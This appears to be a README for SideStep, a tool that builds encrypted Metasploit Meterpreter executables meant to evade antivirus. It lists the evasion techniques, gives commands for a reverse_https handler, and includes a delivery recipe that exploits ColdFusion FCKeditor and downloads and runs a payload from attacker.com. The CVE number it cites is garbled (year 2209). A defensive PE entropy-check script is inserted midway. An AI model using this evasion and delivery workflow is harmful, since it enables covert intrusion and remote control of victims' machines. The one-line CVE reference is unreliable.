generates Metasploit payloads encrypted using the CryptoPP library
(license included), and uses several other techniques to evade AV.
SideStep is a python script that automatically generates and compiles C code that uses encrypted Metasploit payloads.
Some of the features of SideStep used to evade AV software include:
- Encrypts the msfvenom-generated Meterpreter shellcode using AES 128-bit encryption (using the CryptoPP C++ library) with a randomly generated key. The payload is decrypted just prior to execution.
- Randomizes all variable and function names. The length of the names is configurable.
- Creates a function that checks the local time on the host, then loops for a configurable number of seconds at the beginning of the program, to evade AV sandboxes. There is also the addition of a DH parameter generator, which adds extra time to the startup.
- Stuffs the executable with a configurable number of random variables that have random values of a configurable size. These variables are initialized prior to the call to main(). This is a technique that is occasionally effective and that I picked up from the NCC Group Metasploit Evasion link above.
- If Cygwin is present, it uses strip to remove debugging symbols and other useful reversing information.
- If you want to use peCloak, it will then encode the assembly instructions in the executable as the last step.
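Two of the features above leave a measurable footprint in the binary: an AES-encrypted payload blob and a block of random-valued globals both push a data section toward maximal byte entropy. The following is an added defender-side triage check, not part of SideStep; the 7.2-bit threshold and 256-byte minimum are assumptions, and build_pe constructs a minimal, non-runnable PE layout so the parser can be exercised offline.

```python
import math
import struct

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: ~8.0 for encrypted/random data, low for code."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(pe: bytes):
    """Yield (name, raw_bytes) for each section header of a PE image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                       # COFF file header (20 bytes)
    n_sections, = struct.unpack_from("<H", pe, coff + 2)
    opt_size, = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size              # section table follows the optional header
    for i in range(n_sections):
        hdr = table + 40 * i                  # IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)
        yield name, pe[raw_ptr:raw_ptr + raw_size]

def suspicious_sections(pe: bytes, threshold: float = 7.2, min_size: int = 256):
    """Names of sections whose raw bytes look encrypted or random-filled.
    A triage heuristic (threshold is an assumption), not proof of anything."""
    return [name for name, raw in pe_sections(pe)
            if len(raw) >= min_size and shannon_entropy(raw) >= threshold]

def build_pe(sections):
    """Construct a minimal, non-runnable PE layout from (name, bytes) pairs so the
    parser can be exercised offline; only the fields the parser reads are filled."""
    opt_size = 0xE0
    img = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))   # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    img += b"\0" * opt_size
    offset = len(img) + 40 * len(sections)    # raw data starts after the section table
    for name, raw in sections:
        img += name.ljust(8, b"\0") + struct.pack("<IIII", len(raw), 0, len(raw), offset)
        img += b"\0" * 16                     # relocation/linenumber fields, characteristics
        offset += len(raw)
    img += b"".join(raw for _, raw in sections)
    return bytes(img)
```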
Requirements:
- Metasploit Community 4.11.1 – Update 2015031001 (or later; this is what I tested with, and some recent previous versions screwed up the shellcode when using the alpha encoder)
- Ruby 2.x
- Windows (7 or 8 should work – tested on 8.1)
- Python 2.7.x
- Visual Studio (free editions should be fine – tested on 2012)
- Windows SDK
- Cygwin with strip utility (if you want to strip debug symbols)
- peCloak (if you want to use it)
Usage
You must configure settings in confsettings.py, and then you must at
a minimum provide the Metasploit listening handler IP and port:
python sidestep.py --ip 192.168.1.1 --port 443
If using the defaults, then a source file will be generated in the
.source directory and the executable will be dropped in the .exe
directory.
Set up a Meterpreter handler on your attacking machine like so (modifying the PAYLOAD, LHOST, and LPORT as needed):
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.1
set LPORT 443
set AutoRunScript post/windows/manage/smart_migrate
run
The best way to deliver the executable via Metasploit is to load up your
exploit, and then set the PAYLOAD to windows/download_exec, and upload
the executable to a web server. Sample configuration:
use exploit/windows/http/coldfusion_fckeditor
set PAYLOAD windows/download_exec
set EXE sidestep.exe
set URL http://www.attacker.com:80/sidestep.exe
set AutoRunScript post/windows/manage/smart_migrate
set RHOST 1.1.1.1
set RPORT 80
run
This would exploit the FCKeditor vulnerability in ColdFusion
(CVE-2209-2265), running shellcode that downloads an executable from the
provided URL, saves it as the provided EXE name, and then executes it.
You can get the source code to SideStep here.